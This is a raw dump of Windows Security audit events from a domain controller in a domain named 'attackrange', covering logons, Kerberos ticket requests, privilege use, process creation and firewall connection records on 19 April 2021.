SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887125
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 10
Restricted Admin Mode: No
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x8DB827
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {453F0EA2-89C5-2B2C-1385-10D5F3D1EC2F}
Process Information:
Process ID: 0x518
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: WIN-DC-982
Source Network Address: 174.27.138.219
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887124
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: administrator
Account Domain: ATTACKRANGE
Logon GUID: {453F0EA2-89C5-2B2C-1385-10D5F3D1EC2F}
Target Server:
Target Server Name: localhost
Additional Information: localhost
Process Information:
Process ID: 0x518
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Network Address: 174.27.138.219
Port: 0
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4769
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Kerberos Service Ticket Operations
OpCode=Info
RecordNumber=887123
Keywords=Audit Success
Message=A Kerberos service ticket was requested.
Account Information:
Account Name: Administrator@ATTACKRANGE.LOCAL
Account Domain: ATTACKRANGE.LOCAL
Logon GUID: {2A1C2E2A-2C70-629D-D742-CF67F2DE680E}
Service Information:
Service Name: WIN-DC-982$
Service ID: ATTACKRANGE\WIN-DC-982$
Network Information:
Client Address: ::1
Client Port: 0
Additional Information:
Ticket Options: 0x40810000
Ticket Encryption Type: 0x12
Failure Code: 0x0
Transited Services: -
This event is generated every time access is requested to a resource such as a computer or a Windows service. The service name indicates the resource to which access was requested.
This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event. The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.
Ticket options, encryption types, and failure codes are defined in RFC 4120.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=887122
Keywords=Audit Success
Message=A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: Administrator
Supplied Realm Name: attackrange.local
User ID: ATTACKRANGE\Administrator
Service Information:
Service Name: krbtgt
Service ID: ATTACKRANGE\krbtgt
Network Information:
Client Address: ::1
Client Port: 0
Additional Information:
Ticket Options: 0x40810010
Result Code: 0x0
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2
Certificate Information:
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
Certificate information is only provided if a certificate was used for pre-authentication.
Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887121
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887120
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887119
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887118
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Process Information:
New Process ID: 0x1858
New Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x34c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887117
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D340A
Process Information:
New Process ID: 0x1bb4
New Process Name: C:\Windows\System32\dwm.exe
Token Elevation Type: %%1938
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1648
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: "dwm.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887116
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D33D1
Privileges: SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeImpersonatePrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887115
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Virtual Account: Yes
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D340A
Linked Logon ID: 0x8D33D1
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x1648
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887114
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Virtual Account: Yes
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D33D1
Linked Logon ID: 0x8D340A
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x1648
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887113
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: DWM-3
Account Domain: Window Manager
Logon GUID: {00000000-0000-0000-0000-000000000000}
Target Server:
Target Server Name: localhost
Additional Information: localhost
Process Information:
Process ID: 0x1648
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Network Address: -
Port: -
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=887112
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x278
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887111
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13fc
New Process Name: C:\Windows\System32\LogonUI.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1648
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: "LogonUI.exe" /flags:0x2 /state0:0xa3a3b055 /state1:0x41c64e6d
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887195
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887194
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887193
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887192
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887191
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x458
New Process Name: C:\Windows\System32\dllhost.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x34c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80}
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887190
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 60398
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887189
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 60398
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69908
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887188
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60398
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887187
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60398
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887186
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 60480
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887185
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 60480
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69908
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887184
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60480
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887183
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60480
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887182
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.14
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887181
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887180
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18c8
New Process Name: C:\Windows\System32\taskhostw.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x518
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: taskhostw.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887179
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 49637
Destination Address: 127.0.0.1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887178
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 49637
Destination Address: 127.0.0.1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887177
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1b0c
Process Name: C:\Windows\System32\csrss.exe
Exit Status: 0x0
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887176
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
